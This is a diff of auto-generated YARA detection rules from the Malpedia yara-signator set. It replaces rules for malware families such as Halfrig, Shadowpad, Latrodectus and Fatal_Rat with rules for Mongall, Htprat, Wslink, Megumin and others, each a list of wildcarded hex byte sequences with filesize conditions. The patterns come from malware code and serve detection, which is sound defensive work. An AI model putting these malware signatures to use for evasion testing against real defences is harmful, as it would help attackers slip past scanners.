-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.halfrig_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mongall"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mongall_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "adc9aecc9470ee0c91f95fb542745149148c07ba82848cc511591fd05aa26a6e"
+		logic_hash = "a7343b890bc7cfe685e1d8a81a17e49736fde69b19000c5c5f4d58892316ec5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91331,32 +91444,32 @@ rule MALPEDIA_Win_Halfrig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8ea3000000 488d0daf800800 e8???????? 833d????????ff 0f858a000000 488d542420 488d8530030000 }
-		$sequence_1 = { 488d542420 e8???????? 488d0db8bd0700 e8???????? 40383d???????? }
-		$sequence_2 = { 4c893d???????? 488d8d30030000 488d05acd70200 488bd6 660f1f840000000000 488d8980000000 0f1000 }
-		$sequence_3 = { 3905???????? 0f8ea3000000 488d0ddf8d0700 e8???????? 833d????????ff 0f858a000000 488d542420 }
-		$sequence_4 = { 0f8ea3000000 488d0d2f6c0700 e8???????? 833d????????ff 0f858a000000 488d542420 4c8bc6 }
-		$sequence_5 = { 4983f815 72db 408835???????? 418b06 4c898b50040000 4088b358040000 3905???????? }
-		$sequence_6 = { 0f1003 488d542420 488bcd 0f29442420 e8???????? 0fb6d0 488d5b10 }
-		$sequence_7 = { 8801 418b06 3905???????? 0f8ea3000000 488d0dcf4f0700 e8???????? 833d????????ff }
-		$sequence_8 = { 418b06 4c898ba0040000 4088b3a8040000 3905???????? 7e4e 488d0d34700400 e8???????? }
-		$sequence_9 = { c705????????6990e984 c705????????3d6d27f5 e8???????? 403835???????? 4c8d0d0e7b0400 7438 }
+		$sequence_0 = { 75ef 57 bf???????? e8???????? 6a7f }
+		$sequence_1 = { 57 8bc2 c1f805 8b0485603f4100 8bfa 83e71f c1e706 }
+		$sequence_2 = { 83c404 5e b801000000 5b c3 83f806 7543 }
+		$sequence_3 = { 83c40c 8bdf 895df4 85c0 }
+		$sequence_4 = { ff15???????? 85f6 7413 6a00 6a00 6a00 }
+		$sequence_5 = { 85f6 7fdf eb07 838de4fdffffff 83bdccfdffff00 8b9de0fdffff 7457 }
+		$sequence_6 = { c745fc00000000 8b7df8 85ff 7509 }
+		$sequence_7 = { c745fc00000000 8b7df8 85ff 7509 5f 5e }
+		$sequence_8 = { 0fbe8028e24000 83e00f eb02 33c0 }
+		$sequence_9 = { 33c9 68???????? 51 6a03 }
 
 	condition:
-		7 of them and filesize < 1369088
+		7 of them and filesize < 199680
 }
-rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE
+rule MALPEDIA_Win_Htprat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3c9e166-1016-5506-93a9-19667db3083c"
+		id = "e0f24e75-a1ab-500e-b0d4-d1209cde7f99"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.outlook_backdoor_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.htprat_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "1c69545b2fc9583e56f8f6f93522f6191f76f6718f05e9ec7b5fbf60b049d689"
+		logic_hash = "e91a3a65365c65376e7831a92808c9a23ec534df8de8b5e0e4180f6424135b1f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91370,32 +91483,32 @@ rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8412fdffff ff442410 ff4c2418 837c241800 7fdb e9???????? 56 }
-		$sequence_1 = { eb0a 8b7508 e8???????? 8bc6 8b4df4 5f 5e }
-		$sequence_2 = { 7708 c6063f 46 c6063d 46 8bc6 2b45e0 }
-		$sequence_3 = { c645fc00 e8???????? 8b4df4 8b4508 64890d00000000 5e c9 }
-		$sequence_4 = { e9???????? 33db 895c2414 8d442414 50 6a01 }
-		$sequence_5 = { 8bf0 8d442418 8bcb e8???????? 8b08 8b4004 }
-		$sequence_6 = { e8???????? 53 56 8d4dd8 eb29 }
-		$sequence_7 = { 8365fc00 6bc01c 03818c000000 56 8b7508 50 }
-		$sequence_8 = { 8b4d08 83c410 8d5104 8bc1 3bca 7412 }
-		$sequence_9 = { 50 e8???????? 8bf0 59 8d8528ffffff 50 e8???????? }
+		$sequence_0 = { 53 8db794010000 c645fc0c e8???????? 53 }
+		$sequence_1 = { 743c 33c0 57 50 668985d8f9ffff }
+		$sequence_2 = { 8bcb e8???????? 57 57 89b398000000 }
+		$sequence_3 = { 57 57 57 ffb574efffff }
+		$sequence_4 = { 832700 8d7708 c6470400 e8???????? 8365fc00 bb???????? 53 }
+		$sequence_5 = { e9???????? 6a22 e9???????? 6a0c e9???????? 83e96e 7479 }
+		$sequence_6 = { 8d742430 e8???????? 8bd6 8d4c2418 c68424e800000009 }
+		$sequence_7 = { 83671000 c747140f000000 c60700 837de810 8b45d4 895d80 }
+		$sequence_8 = { 8d442468 ff742478 50 8d8424a8000000 50 e8???????? 83c40c }
+		$sequence_9 = { 8d741eff 8d5801 56 57 }
 
 	condition:
-		7 of them and filesize < 2912256
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Vflooder_Auto : FILE
+rule MALPEDIA_Win_Wslink_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6da3af77-bf0c-5d0d-ad9f-8f035b957625"
+		id = "ff84d0ba-7c6b-551a-aa8c-f9cc4b863272"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vflooder_auto.yar#L1-L109"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wslink_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "14b49a20a71548a980ead5d4f60898b254e57c1fbb273dc458944348b271a849"
+		logic_hash = "87e90a1a72b66a6938037799ecf454860aae5ad77216cc7fb9189ea554932eeb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91409,32 +91522,32 @@ rule MALPEDIA_Win_Vflooder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 9c ff742404 8f4500 9c 60 }
-		$sequence_1 = { b02e f5 f2ae e8???????? }
-		$sequence_2 = { 0000 43 7265 61 }
-		$sequence_3 = { e8???????? 0000 43 7265 }
-		$sequence_4 = { e8???????? 0000 43 7265 61 7465 }
-		$sequence_5 = { 9c ff742404 8f4500 9c }
-		$sequence_6 = { e8???????? 0000 43 7265 61 }
-		$sequence_7 = { f5 83ef04 f5 ff37 }
-		$sequence_8 = { 9c f2ae 9c 9c }
-		$sequence_9 = { 9c 60 9c 9c 8d642430 }
+		$sequence_0 = { 8bd0 e8???????? 4885c0 7494 48638ba0000000 488bd1 3b8ba4000000 }
+		$sequence_1 = { 488b8be8000000 4885c9 7405 e8???????? 488b7b08 4885ff }
+		$sequence_2 = { 488b05???????? 4833c4 48898424c0000000 33db 458be1 4c89442450 4183cfff }
+		$sequence_3 = { 4c8d0d633b0a00 448d400d e9???????? 83781000 0f859f000000 83780800 0f8495000000 }
+		$sequence_4 = { 418bc5 e9???????? bad9000000 4c8d0d96920700 b910000000 448d42b3 c7442420d8000000 }
+		$sequence_5 = { 4885c0 743d 4885f6 740e 660f1f440000 48ffce 881c06 }
+		$sequence_6 = { 7532 4c8d0d97450a00 8d4810 448d4008 ba9a000000 c744242048010000 e8???????? }
+		$sequence_7 = { 488bd8 4885c0 752b 4c8d0d885f0b00 8d506c 8d4820 448d4041 }
+		$sequence_8 = { 0302 6690 e11c 0100 ec 1c01 00d6 }
+		$sequence_9 = { e8???????? 8b8c2490000000 4885c0 746e 894b08 4d8b0f 498b5500 }
 
 	condition:
-		7 of them and filesize < 860160
+		7 of them and filesize < 2007040
 }
-rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE
+rule MALPEDIA_Win_Aveo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e6b5074a-ee80-5f17-8d10-821d108c299b"
+		id = "58fed8b1-4a4c-5644-af15-f834ce14a282"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pseudo_manuscrypt_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aveo_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "c6f7c325b24974deecc4b35c3043dbcf14d37411aa98d6d4fbada988adbed753"
+		logic_hash = "50253623bc7141d72df42bdf99f9bb3131c73cf858d2c7872df300d67b84cd17"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91448,32 +91561,32 @@ rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45ec 8d044502000000 a3???????? 8b4dfc 33cd e8???????? 8be5 }
-		$sequence_1 = { 8b8594feffff 8d8df0feffff 8b9ddcfeffff 8bbdd8feffff 99 03c3 898de4feffff }
-		$sequence_2 = { 8bf8 ff15???????? 5e 8bc7 5f 5b 8be5 }
-		$sequence_3 = { 50 e8???????? 83c404 c70700000000 8b07 c7470800000000 }
-		$sequence_4 = { eb6b 8d45a0 50 8d4d8c e8???????? 8b4dc0 85c9 }
-		$sequence_5 = { 8bec 83ec14 57 8d45ec c745ec14000000 50 8bf9 }
-		$sequence_6 = { 7407 b801000000 5e c3 8b86c0000000 85c0 7411 }
-		$sequence_7 = { 390d???????? 0f94c0 c3 a1???????? c3 8bff 55 }
-		$sequence_8 = { ff15???????? 83c40c 8d8d1cf7ffff 51 6802000080 ff15???????? 5f }
-		$sequence_9 = { 56 57 8bf9 b9???????? e8???????? 8d45ac 50 }
+		$sequence_0 = { 894804 894808 89480c b9???????? 8d7901 8a11 41 }
+		$sequence_1 = { 68???????? e8???????? 83c404 899df4fdffff eb06 89b5f4fdffff 68???????? }
+		$sequence_2 = { 52 50 8d9df8feffff e8???????? }
+		$sequence_3 = { 8d8dfcefffff 51 8bf8 e8???????? 33ff 39bdf4efffff }
+		$sequence_4 = { e8???????? 83c40c 8d842418010000 50 8d8c241c030000 }
+		$sequence_5 = { b9???????? 8d7901 8a11 41 84d2 75f9 2bcf }
+		$sequence_6 = { 8db590fdffff 898574fdffff e8???????? be00100000 }
+		$sequence_7 = { 50 e8???????? 8d8df4f9ffff 51 8d95f4feffff 52 }
+		$sequence_8 = { 6803800000 50 ff15???????? 8b4de8 6a00 6a05 }
+		$sequence_9 = { 51 e8???????? 8b4df8 83c404 5f }
 
 	condition:
-		7 of them and filesize < 753664
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Shadowpad_Auto : FILE
+rule MALPEDIA_Win_Secondhandtea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c1faf29-7964-56d7-af15-c1e6eca3ddc5"
+		id = "24430ceb-9ce2-5574-9afd-319803953494"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shadowpad_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.secondhandtea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.secondhandtea_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f49d5d94105b284c3bf5a2bc14ecce3430da1255366e6df534c457baba4feead"
+		logic_hash = "7cb092741fedaef6b40610c6e7ec59e3f301485274283d64b8f6a31d3c54f53c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91487,32 +91600,32 @@ rule MALPEDIA_Win_Shadowpad_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 e8???????? 50 ffd7 8d75d0 8945ec }
-		$sequence_1 = { a80f 0f85c4000000 68f40f0000 8d45ec 50 8d4b0c }
-		$sequence_2 = { 3b450c 0f8d85000000 41 51 8d45e0 e8???????? }
-		$sequence_3 = { 53 56 33db 57 33d2 eb2d }
-		$sequence_4 = { 894df8 890e 3803 7439 8b06 }
-		$sequence_5 = { 88144b 8a0408 8b560c c0e804 046a 88444a01 }
-		$sequence_6 = { c20400 55 8bec 53 57 ff7508 ff15???????? }
-		$sequence_7 = { 8bec 51 8a4201 8845ff }
-		$sequence_8 = { 33c0 8d4de8 e8???????? 8b7de0 8bc3 50 }
-		$sequence_9 = { 32d1 46 8810 3b7508 0f8c74ffffff 5f }
+		$sequence_0 = { e8???????? cc 4c8d0554c31400 498bd4 488bcd e8???????? 85c0 }
+		$sequence_1 = { e8???????? 488bcf e8???????? 488b8b18100000 8b93fc070000 0fb701 3bd0 }
+		$sequence_2 = { 753b c744242025000000 41b841000000 4c8d0d2e9b0b00 bac6000000 b90d000000 e8???????? }
+		$sequence_3 = { e8???????? 4c8b642468 448be8 4883c470 415d 5f 5e }
+		$sequence_4 = { e8???????? 8bf8 85c0 7ead 294318 7408 014314 }
+		$sequence_5 = { e8???????? 4533c0 4c8d8bb4010000 418d502d 488bc8 e8???????? 488bcf }
+		$sequence_6 = { e9???????? 498bc9 e8???????? 488bf8 4885c0 7527 4c8d0d9d780f00 }
+		$sequence_7 = { e8???????? 488be8 4885c0 750f 488d154fac0c00 488bcf e8???????? }
+		$sequence_8 = { e8???????? 418bc7 488b4d68 4833cd e8???????? 488b9da0000000 488bb5a8000000 }
+		$sequence_9 = { e8???????? 33c0 ebc1 ba7a000000 4c8d0d517c0a00 c744242078000000 8d4a89 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 4452352
 }
-rule MALPEDIA_Win_Latrodectus_Auto : FILE
+rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8cce3c90-39d6-56c7-a70d-a97dc872745e"
+		id = "8b018fd5-a77f-5d35-804b-d70e18428f2b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.latrodectus_auto.yar#L1-L177"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiteblackcrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.whiteblackcrypt_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "db1ab846766f29e28e7ba8cb8d168586ae215020b0ee3fc8ee79e547f904c4d9"
+		logic_hash = "4f74eb7c5773b19a8be72f0225ca23ef138b3bc453243d9314335e49ca519939"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91526,38 +91639,32 @@ rule MALPEDIA_Win_Latrodectus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4c2430 8801 488b442430 48ffc0 4889442430 8b44242c }
-		$sequence_1 = { 33c0 6689842430010000 ba18000000 488d8c24d0000000 e8???????? 488d8424d0000000 }
-		$sequence_2 = { 33c9 ff15???????? 488905???????? 48833d????????00 7414 }
-		$sequence_3 = { 488b542458 488d4c2428 e8???????? 488b4c2458 e8???????? 488b442420 }
-		$sequence_4 = { 488b00 488b4818 e8???????? 488b442430 488b00 4883782000 }
-		$sequence_5 = { 89442420 8b442420 4883f825 7336 8b442420 486bc018 }
-		$sequence_6 = { 488bc1 488b4c2450 0fb709 488d0488 4889442438 488b442438 }
-		$sequence_7 = { e8???????? 89442420 ba68000000 488d4c2430 e8???????? c744243068000000 }
-		$sequence_8 = { 4883e808 4883f81f 0f87ab000000 e8???????? 488bc3 488b8dd0050000 }
-		$sequence_9 = { 410fb6f0 e9???????? 80fb05 7405 80fb0b 7508 }
-		$sequence_10 = { 480f474d70 488b8580000000 4889442430 48894c2428 4889542420 4c8d05fd2d0600 }
-		$sequence_11 = { 4833c4 4889842448010000 498bf1 4d8bf0 8bfa 4c89442458 }
-		$sequence_12 = { 41b826000000 488d1591b10b00 488d4c2430 e8???????? 90 488b7c2440 }
-		$sequence_13 = { 4883ec30 488b442460 498bf9 492bf8 488bf2 482bf1 }
-		$sequence_14 = { 0f87dc030000 0faee8 e8???????? 660f6f05???????? f30f7f442478 664489642468 }
-		$sequence_15 = { 0fb605???????? 884130 c6413100 0f57c0 0f11442438 488d3da9630d00 }
+		$sequence_0 = { 40326c243e 31ef 4131fa 4531d6 4531f5 }
+		$sequence_1 = { 7477 83feff 7c60 752e 488b8b38020000 }
+		$sequence_2 = { 410f94c2 4409d0 4109cb 753a }
+		$sequence_3 = { ff15???????? 83f812 0f84d4000000 488b8b38020000 e8???????? 48c7c0ffffffff }
+		$sequence_4 = { 0f840c010000 488d7c2420 4889da 41b804010000 4889f9 }
+		$sequence_5 = { 4889c1 e8???????? 4889e9 4889c2 4883c428 5b }
+		$sequence_6 = { 0f84d4000000 488b8b38020000 e8???????? 48c7c0ffffffff 48898338020000 }
+		$sequence_7 = { 4c89e1 41c6442cff00 e8???????? 4c39e6 }
+		$sequence_8 = { 4889f1 e8???????? 4889f1 85c0 7407 }
+		$sequence_9 = { 4401e6 4d63c4 4889f9 4989d9 ba01000000 }
 
 	condition:
-		7 of them and filesize < 2467840
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Ktlv_Door_Auto : FILE
+rule MALPEDIA_Win_Megumin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e065a03-91ac-5e12-9f0d-2a07114a6941"
+		id = "c4a2dcf8-4894-5cef-ac41-bcc9553ffc60"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ktlv_door"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ktlv_door_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.megumin_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "7086a37fac571e3e072f3722403d024774dd0aed3f77f3425014c9e7e0c7108d"
+		logic_hash = "ea7444cfb1798579fc346f04ef83b325fb03cf7f61d5558430123962ac8f5635"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91571,32 +91678,32 @@ rule MALPEDIA_Win_Ktlv_Door_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffc2 85d2 7d10 488d053ed25900 31db 31c9 e8???????? }
-		$sequence_1 = { eb0e 488d3d1a475800 6690 e8???????? 488d0594b92c00 e8???????? 48c7400836000000 }
-		$sequence_2 = { eb25 488b8424a00c0000 4889c3 488d8c24780a0000 0f1f4000 e8???????? 488b542430 }
-		$sequence_3 = { eb11 488d7818 488b8c2440080000 e8???????? 48c7400810000000 488d0da4e81900 488908 }
-		$sequence_4 = { ffd0 488bac24c8010000 4881c4d0010000 c3 48899c2450020000 48898c2458020000 c644243700 }
-		$sequence_5 = { eb0c 488d3d9bba4000 e8???????? 488b0d???????? 48898c2458050000 488d05800f1700 e8???????? }
-		$sequence_6 = { eb0d 488bbc24a8000000 e8???????? 4889c6 4889d9 488b842490000000 488b5c2460 }
-		$sequence_7 = { eb0e 488d7818 488b4c2418 e8???????? 4889c3 488d05371d3d00 488b6c2428 }
-		$sequence_8 = { eb11 488d7838 488b8c24e8010000 e8???????? 488d0d529c2900 4889c2 4889842400010000 }
-		$sequence_9 = { e8???????? 440f11bc24e0010000 440f11bc24f0010000 488b8c24e0000000 48898c24e0010000 488b8c24c8010000 48898c24e8010000 }
+		$sequence_0 = { e8???????? 83c418 c745fc04000000 bb1f000000 83781410 899de0feffff 7202 }
+		$sequence_1 = { c1e81f c78570ffffff0f000000 c6855cffffff00 f20f5804c540814600 f20f5885f8feffff f20f1185f8feffff e8???????? }
+		$sequence_2 = { 3bc2 0f827a0c0000 2bce 2bc2 83c1fe 3bc1 0f42c8 }
+		$sequence_3 = { 6a03 68???????? 8d8da4fdffff e8???????? 83bdb8fdffff10 8d95a4fdffff ffb5b4fdffff }
+		$sequence_4 = { 8d4dc0 c645fc03 8bf0 e8???????? 85f6 0f844f010000 8b95e0fdffff }
+		$sequence_5 = { 68???????? e8???????? 8d7db8 8d4f01 0f1f4000 8a07 47 }
+		$sequence_6 = { c7461000000000 0f42bde0feffff 83bde4feffff10 57 0f438dd0feffff 51 c746140f000000 }
+		$sequence_7 = { 8d9570fbffff 2bd1 8a01 8d4901 88440aff 84c0 }
+		$sequence_8 = { 8bcf ffb5c4fbffff 6a05 e8???????? 8bf8 c785bcfbffff00000000 c785c0fbffff00000000 }
+		$sequence_9 = { 0f8700010000 c1e003 3d00100000 721f 8d4823 3bc8 0f86f0000000 }
 
 	condition:
-		7 of them and filesize < 14630912
+		7 of them and filesize < 1007616
 }
-rule MALPEDIA_Win_Rawdoor_Auto : FILE
+rule MALPEDIA_Win_Laturo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc76b812-17c2-5ec8-96b0-76719ad244ed"
+		id = "f1cda2c1-6a5a-560d-b916-62a96cbfcef4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rawdoor_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.laturo_auto.yar#L1-L175"
 		license_url = "N/A"
-		logic_hash = "ec178538305c82f8b2a93ab81f9192cdc24be91763d3a20d8dccb588ac264211"
+		logic_hash = "fadff8d37ea5314574a4da4608d7ce7e1536afc4770400da40abe05fbc19031e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91610,38 +91717,38 @@ rule MALPEDIA_Win_Rawdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 030e 03d1 c1c207 4103d2 }
-		$sequence_1 = { 030b 4403d1 418bc8 f7d1 23ca }
-		$sequence_2 = { 034218 418d91051d8804 458d8a39d0d4d9 03d0 }
-		$sequence_3 = { 03442444 3d00040000 730e 488d4c2450 }
-		$sequence_4 = { 034210 418d90a9cfde4b 458d81604bbbf6 03d0 }
-		$sequence_5 = { 034608 03d0 8b442408 4103c1 4c8b4c2410 }
-		$sequence_6 = { 034808 4403c1 8bcb f7d1 23ca }
-		$sequence_7 = { 034824 418bc0 4403c9 33c2 418d8be599dbe6 }
-		$sequence_8 = { 0101 0101 0100 0000 0001 }
-		$sequence_9 = { 0000 0001 0100 0001 0101 }
-		$sequence_10 = { 8be5 5d c3 ff15???????? 83f8ff 746f 8d85bcf8ffff }
-		$sequence_11 = { 0f8405010000 83e809 7415 83e803 0f8538010000 c745dc44690210 e9???????? }
-		$sequence_12 = { c3 68???????? 50 ff15???????? 85c0 751f 68???????? }
-		$sequence_13 = { 57 8b7d08 8d14dd00000000 8b0f c1e903 83e13f 894d0c }
-		$sequence_14 = { ffd6 ffb5e4feffff ffd6 57 85db 7439 81fb02010000 }
-		$sequence_15 = { 50 e8???????? 6867010000 8d8529fcffff c68528fcffff00 6a00 50 }
+		$sequence_0 = { 418bf0 4c8d0d83b80000 8bda 4c8d0572b80000 488bf9 488d1570b80000 }
+		$sequence_1 = { 88442438 807c243801 7413 807c243802 743a }
+		$sequence_2 = { 57 4883ec78 c744242000000000 e8???????? 48833d????????00 0f84fb010000 488b8c2490000000 }
+		$sequence_3 = { 4889442410 837c244c40 750d 0fb60424 88442403 }
+		$sequence_4 = { 3b442450 740a 8b442420 89442424 }
+		$sequence_5 = { 4883ec38 488b442440 48833800 747b c744242000000000 eb0a }
+		$sequence_6 = { 25f0000000 3d80000000 0f8521010000 0fb6442450 488b4c2430 4803c8 488bc1 }
+		$sequence_7 = { 4488742470 eb22 488d3d720a0100 eb19 488d3d610a0100 eb10 }
+		$sequence_8 = { eb3f f6c201 740d 8b0e 8d41fb 3985e0fdffff 7430 }
+		$sequence_9 = { 2502ffffff eb0d 8b45f4 807dfa05 0fb6c0 }
+		$sequence_10 = { 8a4dff d3e0 84c0 7907 }
+		$sequence_11 = { c745d500000000 66c745c40f80 c745c600000000 c645ff00 897de4 }
+		$sequence_12 = { c645f404 eb2b c645f401 eb25 f6c110 7410 }
+		$sequence_13 = { 51 0f95c0 6a40 8d044505000000 50 53 }
+		$sequence_14 = { 43 884210 2a5dd8 881a 80fb0f 7615 814a1800500000 }
+		$sequence_15 = { 68???????? 897df8 ff15???????? 85c0 742a 8b3d???????? 83fe20 }
 
 	condition:
-		7 of them and filesize < 445440
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Fatal_Rat_Auto : FILE
+rule MALPEDIA_Win_Shujin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6ffdc4b6-3750-513f-882d-601b90060611"
+		id = "20008e73-1b75-5617-9f42-c7c9bccd7072"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fatal_rat_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shujin_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "3b6c3f51dd6f327df47fc74ff663d2bedf14223af4a9dd48f5c4c4ee2763ed08"
+		logic_hash = "498da53687cd17478c7025106c84cdcc0e6118bdb951cd75112ef2c2e9026da6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91655,69 +91762,69 @@ rule MALPEDIA_Win_Fatal_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d c3 55 8bec 8b4508 8b4d0c 2d00803ed5 }
-		$sequence_1 = { c3 55 8bec 81ec04020000 53 57 6a7f }
-		$sequence_2 = { 68???????? 89470c ff7508 ffd6 8b4f0c 894710 }
-		$sequence_3 = { ff15???????? 85c0 894508 0f84e9000000 8b35???????? 68???????? 50 }
-		$sequence_4 = { 8d85a4fdffff 56 50 8935???????? ff15???????? 83c40c 6a0a }
-		$sequence_5 = { 59 740d 6a00 68???????? ff15???????? c9 c3 }
-		$sequence_6 = { 83c310 ebaf 8d4dc0 c645fc01 }
-		$sequence_7 = { 57 6a00 ff7508 ffd6 }
-		$sequence_8 = { 750c 57 ff15???????? e9???????? 53 8d45fc }
-		$sequence_9 = { 50 ff15???????? ff75f4 8946f8 6a00 50 ff15???????? }
+		$sequence_0 = { ff35???????? 8f442404 68dd5d08ae 60 ff3424 }
+		$sequence_1 = { 56 68???????? 53 53 ff15???????? 8984bdfcfeffff 47 }
+		$sequence_2 = { 660fa3ff f8 3529af0800 9c c7858cfcffffcccccccc 9c f8 }
+		$sequence_3 = { 6814050000 53 68???????? e8???????? 83c40c 891d???????? }
+		$sequence_4 = { 8b742410 57 6a08 5f 8b4cfe50 }
+		$sequence_5 = { c1ea02 8a92506c4000 8811 83e003 c1e004 8bd6 c1ea04 }
+		$sequence_6 = { 8bda 23d8 0fb69be8a54000 33fb 8b5d08 337b04 8b5d0c }
